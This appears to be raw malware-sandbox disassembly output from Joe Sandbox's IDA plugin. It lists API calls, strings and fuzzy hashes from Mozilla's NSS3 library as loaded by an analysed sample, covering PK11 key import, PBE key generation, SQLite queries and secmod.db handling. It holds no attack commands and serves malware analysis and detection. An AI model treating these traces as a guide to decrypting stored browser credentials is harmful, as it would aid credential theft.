                                                            • GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6C9F1CA1
                                                            • GetLengthSid.ADVAPI32(?), ref: 6C9F1CA9
                                                            • malloc.MOZGLUE(00000000), ref: 6C9F1CB4
                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 6C9F1CCC
                                                            • GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6C9F1CE4
                                                            • GetLengthSid.ADVAPI32(?), ref: 6C9F1CEC
                                                            • malloc.MOZGLUE(00000000), ref: 6C9F1CFD
                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 6C9F1D0F
                                                            • CloseHandle.KERNEL32(?), ref: 6C9F1D17
                                                            • AllocateAndInitializeSid.ADVAPI32 ref: 6C9F1D4D
                                                            • GetLastError.KERNEL32 ref: 6C9F1D73
                                                            • PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6C9F1D7F
                                                            Strings
                                                            • _PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6C9F1D7A
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
                                                            • String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
                                                            • API String ID: 3748115541-1216436346
                                                            • Opcode ID: be8f3b4c8da5aec252488d27a554d1a99f27f89d4d7f4ddc88a5dc90986a7ed0
                                                            • Instruction ID: 8b884330efb93bdfa650526c655f934565b88b1876be1d1db62d708346fd48e5
                                                            • Opcode Fuzzy Hash: be8f3b4c8da5aec252488d27a554d1a99f27f89d4d7f4ddc88a5dc90986a7ed0
                                                            • Instruction Fuzzy Hash: 3C3163B5A00218AFEF10EF64CC48BAA7BB9FF4E348F444165F609A3150E7309994CF65
                                                            APIs
                                                            • __aulldiv.LIBCMT ref: 6C9F3DFB
                                                            • __allrem.LIBCMT ref: 6C9F3EEC
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9F3FA3
                                                            • memcpy.VCRUNTIME140(?,?,00000001), ref: 6C9F4047
                                                            • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C9F40DE
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9F415F
                                                            • __allrem.LIBCMT ref: 6C9F416B
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9F4288
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9F42AB
                                                            • __allrem.LIBCMT ref: 6C9F42B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
                                                            • String ID: %02d$%03d$%04d$%lld
                                                            • API String ID: 703928654-3678606288
                                                            • Opcode ID: c390903a67f5fee206e2a92c54460c86420b48a2103c14947f448b8d1a89c564
                                                            • Instruction ID: d4c66b26a0c2908658002601a9118808206bdbdba4da9399e76179d21f739c81
                                                            • Opcode Fuzzy Hash: c390903a67f5fee206e2a92c54460c86420b48a2103c14947f448b8d1a89c564
                                                            • Instruction Fuzzy Hash: 7AF14371A087409FE715CF38C981A6AB7FABF95308F148A2DF4A597B50E734D486CB42
                                                            APIs
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9A1D58
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9A1EFD
                                                            • sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6C9A1FB7
                                                            Strings
                                                            • no more rows available, xrefs: 6C9A2264
                                                            • abort due to ROLLBACK, xrefs: 6C9A2223
                                                            • SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6C9A1F83
                                                            • unsupported file format, xrefs: 6C9A2188
                                                            • table, xrefs: 6C9A1C8B
                                                            • another row available, xrefs: 6C9A2287
                                                            • sqlite_temp_master, xrefs: 6C9A1C5C
                                                            • unknown error, xrefs: 6C9A2291
                                                            • sqlite_master, xrefs: 6C9A1C61
                                                            • attached databases must use the same text encoding as main database, xrefs: 6C9A20CA
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
                                                            • String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
                                                            • API String ID: 563213449-2102270813
                                                            • Opcode ID: cee4ac97be36fae941e02e9cc160fff6101a7f22fa772d64a03a14e3d376f9c1
                                                            • Instruction ID: ce3a6f2ba5ceec7fc025786247f834330dacaa399a6d763c740436584829df9e
                                                            • Opcode Fuzzy Hash: cee4ac97be36fae941e02e9cc160fff6101a7f22fa772d64a03a14e3d376f9c1
                                                            • Instruction Fuzzy Hash: EE12E270608741CFD705CF5AC484A1AB7F6BF96318F18896DE8998BB51D731EC46CB82
                                                            APIs
                                                            • PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6CA2FD06
                                                              • Part of subcall function 6CA2F670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6CA2F696
                                                              • Part of subcall function 6CA2F670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6CA2F789
                                                              • Part of subcall function 6CA2F670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6CA2F796
                                                              • Part of subcall function 6CA2F670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6CA2F79F
                                                              • Part of subcall function 6CA2F670: SECITEM_DupItem_Util.NSS3 ref: 6CA2F7F0
                                                              • Part of subcall function 6CA53440: PK11_GetAllTokens.NSS3 ref: 6CA53481
                                                              • Part of subcall function 6CA53440: PR_SetError.NSS3(00000000,00000000), ref: 6CA534A3
                                                              • Part of subcall function 6CA53440: TlsGetValue.KERNEL32 ref: 6CA5352E
                                                              • Part of subcall function 6CA53440: EnterCriticalSection.KERNEL32(?), ref: 6CA53542
                                                              • Part of subcall function 6CA53440: PR_Unlock.NSS3(?), ref: 6CA5355B
                                                            • SECITEM_DupItem_Util.NSS3(?), ref: 6CA2FDAD
                                                              • Part of subcall function 6CA5FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CA09003,?), ref: 6CA5FD91
                                                              • Part of subcall function 6CA5FD80: PORT_Alloc_Util.NSS3(A4686CA6,?), ref: 6CA5FDA2
                                                              • Part of subcall function 6CA5FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CA6,?,?), ref: 6CA5FDC4
                                                            • SECITEM_DupItem_Util.NSS3(?), ref: 6CA2FE00
                                                              • Part of subcall function 6CA5FD80: free.MOZGLUE(00000000,?,?), ref: 6CA5FDD1
                                                              • Part of subcall function 6CA4E550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA4E5A0
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA2FEBB
                                                            • PK11_FreeSymKey.NSS3(00000000), ref: 6CA2FEC8
                                                            • PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6CA2FED3
                                                            • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CA2FF0C
                                                            • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CA2FF23
                                                            • PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6CA2FF4D
                                                            • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CA2FFDA
                                                            • PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6CA30007
                                                            • PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6CA30029
                                                            • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CA30044
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
                                                            • String ID:
                                                            • API String ID: 138705723-0
                                                            • Opcode ID: 1a77d56d1d14aa106d599e9cc92d7c3efabce5730bfd8a52ebc0fe122772cdf2
                                                            • Instruction ID: 3080506377ddc5b5b3f5243d4bb99e2ef477b8fa01cdfa515a9b3bc693c6671a
                                                            • Opcode Fuzzy Hash: 1a77d56d1d14aa106d599e9cc92d7c3efabce5730bfd8a52ebc0fe122772cdf2
                                                            • Instruction Fuzzy Hash: 07B1C471604221AFE714CF29CC41A6BF7E5FF88308F588A1DE999C7A41E774E984CB91
                                                            APIs
                                                            • SECOID_FindOID_Util.NSS3(?), ref: 6CA27DDC
                                                              • Part of subcall function 6CA607B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CA08298,?,?,?,6C9FFCE5,?), ref: 6CA607BF
                                                              • Part of subcall function 6CA607B0: PL_HashTableLookup.NSS3(?,?), ref: 6CA607E6
                                                              • Part of subcall function 6CA607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CA6081B
                                                              • Part of subcall function 6CA607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CA60825
                                                            • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CA27DF3
                                                            • PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6CA27F07
                                                            • PK11_GetPadMechanism.NSS3(00000000), ref: 6CA27F57
                                                            • PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6CA27F98
                                                            • PK11_FreeSymKey.NSS3(?), ref: 6CA27FC9
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA27FDE
                                                            • PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6CA28000
                                                              • Part of subcall function 6CA49430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6CA27F0C,?,00000000,00000000,00000000,?), ref: 6CA4943B
                                                              • Part of subcall function 6CA49430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6CA4946B
                                                              • Part of subcall function 6CA49430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6CA49546
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA28110
                                                            • PK11_FreeSymKey.NSS3(00000000), ref: 6CA2811D
                                                            • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CA2822D
                                                            • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CA2823C
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
                                                            • String ID:
                                                            • API String ID: 1923011919-0
                                                            • Opcode ID: c7a05030f330ebe4b5edca6d9b5ab3663de309b490ecfe26be5389017d04df99
                                                            • Instruction ID: 747c2442451e18606327480a318b136dc75ae5eb32fb827c4278e2677bbd75c8
                                                            • Opcode Fuzzy Hash: c7a05030f330ebe4b5edca6d9b5ab3663de309b490ecfe26be5389017d04df99
                                                            • Instruction Fuzzy Hash: A6C171B1D002299BEB21CF14CD40FEAB7B9AF05308F0881E5E91DA6641E7359ED9CF61
                                                            APIs
                                                            • memcpy.VCRUNTIME140(?,?,00000020), ref: 6CA51F19
                                                            • memcpy.VCRUNTIME140(?,?,00000020), ref: 6CA52166
                                                            • memcpy.VCRUNTIME140(?,?,00000010), ref: 6CA5228F
                                                            • memcpy.VCRUNTIME140(?,?,00000010), ref: 6CA523B8
                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CA5241C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: memcpy$Error
                                                            • String ID: manufacturer$model$serial$token
                                                            • API String ID: 3204416626-1906384322
                                                            • Opcode ID: f939cc2a0e746b737736e8c3e55df458f10ff9c1b61f11996efd187608f08133
                                                            • Instruction ID: f3e71950b93e7a45a2953ddd9855f34a483bae8cb0b75cd5fc639b5080f70a80
                                                            • Opcode Fuzzy Hash: f939cc2a0e746b737736e8c3e55df458f10ff9c1b61f11996efd187608f08133
                                                            • Instruction Fuzzy Hash: FC0220A2D0C7C86EF7318A71C44C7E76AE09B45328F8C576EC6DE46A83C3B859D98351
                                                            APIs
                                                            • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CA01C6F,00000000,00000004,?,?), ref: 6CA56C3F
                                                              • Part of subcall function 6CAAC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CAAC2BF
                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CA01C6F,00000000,00000004,?,?), ref: 6CA56C60
                                                            • PR_ExplodeTime.NSS3(00000000,6CA01C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CA01C6F,00000000,00000004,?,?), ref: 6CA56C94
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                            • String ID: gfff$gfff$gfff$gfff$gfff
                                                            • API String ID: 3534712800-180463219
                                                            • Opcode ID: 6882e8ce76ff16db83b17db155da2cdcc66180a2595977b52672c0cab8789ccb
                                                            • Instruction ID: 66b32975d3e22f46f5c069afb24c37b8b4f3dfba07b1cfd6935fc1b1cb90ce15
                                                            • Opcode Fuzzy Hash: 6882e8ce76ff16db83b17db155da2cdcc66180a2595977b52672c0cab8789ccb
                                                            • Instruction Fuzzy Hash: 51513B72B016494FC70CCDADDC527DABBDAABA4310F48C23AE842DB781D638D946C751
                                                            APIs
                                                            • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CA6BD48
                                                            • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CA6BD68
                                                            • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CA6BD83
                                                            • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CA6BD9E
                                                            • NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6CA6BDB9
                                                            • NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6CA6BDD0
                                                            • NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6CA6BDEA
                                                            • NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6CA6BE04
                                                            • NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6CA6BE1E
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: AlgorithmPolicy
                                                            • String ID:
                                                            APIs
                                                            • PR_CallOnce.NSS3(6CB614E4,6CACCC70), ref: 6CB18D47
                                                            • PR_GetCurrentThread.NSS3 ref: 6CB18D98
                                                              • Part of subcall function 6C9F0F00: PR_GetPageSize.NSS3(6C9F0936,FFFFE8AE,?,6C9816B7,00000000,?,6C9F0936,00000000,?,6C98204A), ref: 6C9F0F1B
                                                              • Part of subcall function 6C9F0F00: PR_NewLogModule.NSS3(clock,6C9F0936,FFFFE8AE,?,6C9816B7,00000000,?,6C9F0936,00000000,?,6C98204A), ref: 6C9F0F25
                                                            • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6CB18E7B
                                                            • htons.WSOCK32(?), ref: 6CB18EDB
                                                            • PR_GetCurrentThread.NSS3 ref: 6CB18F99
                                                            • PR_GetCurrentThread.NSS3 ref: 6CB1910A
                                                            Strings
                                                            Similarity
                                                            • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                            • String ID: %u.%u.%u.%u
                                                            APIs
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6C998637,?,?), ref: 6CAD9E88
                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6C998637), ref: 6CAD9ED6
                                                            Strings
                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CAD9EC0
                                                            • %s at line %d of [%.10s], xrefs: 6CAD9ECF
                                                            • database corruption, xrefs: 6CAD9ECA
                                                            Similarity
                                                            • API ID: _byteswap_ulongsqlite3_log
                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                            APIs
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB1D086
                                                            • PR_Malloc.NSS3(00000001), ref: 6CB1D0B9
                                                            • PR_Free.NSS3(?), ref: 6CB1D138
                                                            Strings
                                                            Similarity
                                                            • API ID: FreeMallocstrlen
                                                            • String ID: >
                                                            APIs
                                                            • PR_LogPrint.NSS3( rv = %s,CKR_FUNCTION_REJECTED,?,6CA31D46), ref: 6CA32345
                                                            Strings
                                                            Similarity
                                                            • API ID: Print
                                                            • String ID: rv = %s$ rv = 0x%x$CKR_BUFFER_TOO_SMALL$CKR_CRYPTOKI_ALREADY_INITIALIZED$CKR_CRYPTOKI_NOT_INITIALIZED$CKR_CURVE_NOT_SUPPORTED$CKR_DEVICE_ERROR$CKR_DEVICE_MEMORY$CKR_DEVICE_REMOVED$CKR_DOMAIN_PARAMS_INVALID$CKR_ENCRYPTED_DATA_INVALID$CKR_ENCRYPTED_DATA_LEN_RANGE$CKR_FUNCTION_CANCELED$CKR_FUNCTION_NOT_PARALLEL$CKR_FUNCTION_REJECTED$CKR_INFORMATION_SENSITIVE$CKR_MUTEX_BAD$CKR_MUTEX_NOT_LOCKED$CKR_NEW_PIN_MODE$CKR_NEXT_OTP$CKR_OBJECT_HANDLE_INVALID$CKR_OK$CKR_OPERATION_ACTIVE$CKR_OPERATION_CANCEL_FAILED$CKR_OPERATION_NOT_INITIALIZED$CKR_PIN_EXPIRED$CKR_PIN_INCORRECT$CKR_PIN_INVALID$CKR_PIN_LEN_RANGE$CKR_PIN_LOCKED$CKR_RANDOM_NO_RNG$CKR_RANDOM_SEED_NOT_SUPPORTED$CKR_SAVED_STATE_INVALID$CKR_SIGNATURE_INVALID$CKR_SIGNATURE_LEN_RANGE$CKR_STATE_UNSAVEABLE$CKR_TEMPLATE_INCOMPLETE$CKR_TEMPLATE_INCONSISTENT$CKR_TOKEN_NOT_PRESENT$CKR_TOKEN_NOT_RECOGNIZED$CKR_TOKEN_RESOURCE_EXCEEDED$CKR_TOKEN_WRITE_PROTECTED$CKR_WRAPPED_KEY_INVALID$CKR_WRAPPED_KEY_LEN_RANGE$CKR_WRAPPING_KEY_HANDLE_INVALID$CKR_WRAPPING_KEY_SIZE_RANGE$CKR_WRAPPING_KEY_TYPE_INCONSISTENT
                                                            APIs
                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6CA65E08
                                                            • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CA65E3F
                                                            • PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6CA65E5C
                                                            • free.MOZGLUE(00000000), ref: 6CA65E7E
                                                            • free.MOZGLUE(00000000), ref: 6CA65E97
                                                            • PORT_Strdup_Util.NSS3(secmod.db), ref: 6CA65EA5
                                                            • _NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6CA65EBB
                                                            • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CA65ECB
                                                            • PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6CA65EF0
                                                            • free.MOZGLUE(00000000), ref: 6CA65F12
                                                            • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CA65F35
                                                            • PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6CA65F5B
                                                            • free.MOZGLUE(00000000), ref: 6CA65F82
                                                            • PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6CA65FA3
                                                            • PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6CA65FB7
                                                            • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6CA65FC4
                                                            • free.MOZGLUE(00000000), ref: 6CA65FDB
                                                            • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CA65FE9
                                                            • free.MOZGLUE(00000000), ref: 6CA65FFE
                                                            • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CA6600C
                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA66027
                                                            • PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6CA6605A
                                                            • PR_smprintf.NSS3(6CB3AAF9,00000000), ref: 6CA6606A
                                                            • free.MOZGLUE(00000000), ref: 6CA6607C
                                                            • free.MOZGLUE(00000000), ref: 6CA6609A
                                                            • free.MOZGLUE(00000000), ref: 6CA660B2
                                                            • free.MOZGLUE(?), ref: 6CA660CE
                                                            Strings
                                                            Similarity
                                                            • API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
                                                            • String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
                                                            APIs
                                                            • PR_NewLock.NSS3 ref: 6C9F1DA3
                                                              • Part of subcall function 6CAC98D0: calloc.MOZGLUE(00000001,00000084,6C9F0936,00000001,?,6C9F102C), ref: 6CAC98E5
                                                            • PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6C9F1DB2
                                                              • Part of subcall function 6C9F1240: TlsGetValue.KERNEL32(00000040,?,6C9F116C,NSPR_LOG_MODULES), ref: 6C9F1267
                                                              • Part of subcall function 6C9F1240: EnterCriticalSection.KERNEL32(?,?,?,6C9F116C,NSPR_LOG_MODULES), ref: 6C9F127C
                                                              • Part of subcall function 6C9F1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C9F116C,NSPR_LOG_MODULES), ref: 6C9F1291
                                                              • Part of subcall function 6C9F1240: PR_Unlock.NSS3(?,?,?,?,6C9F116C,NSPR_LOG_MODULES), ref: 6C9F12A0
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C9F1DD8
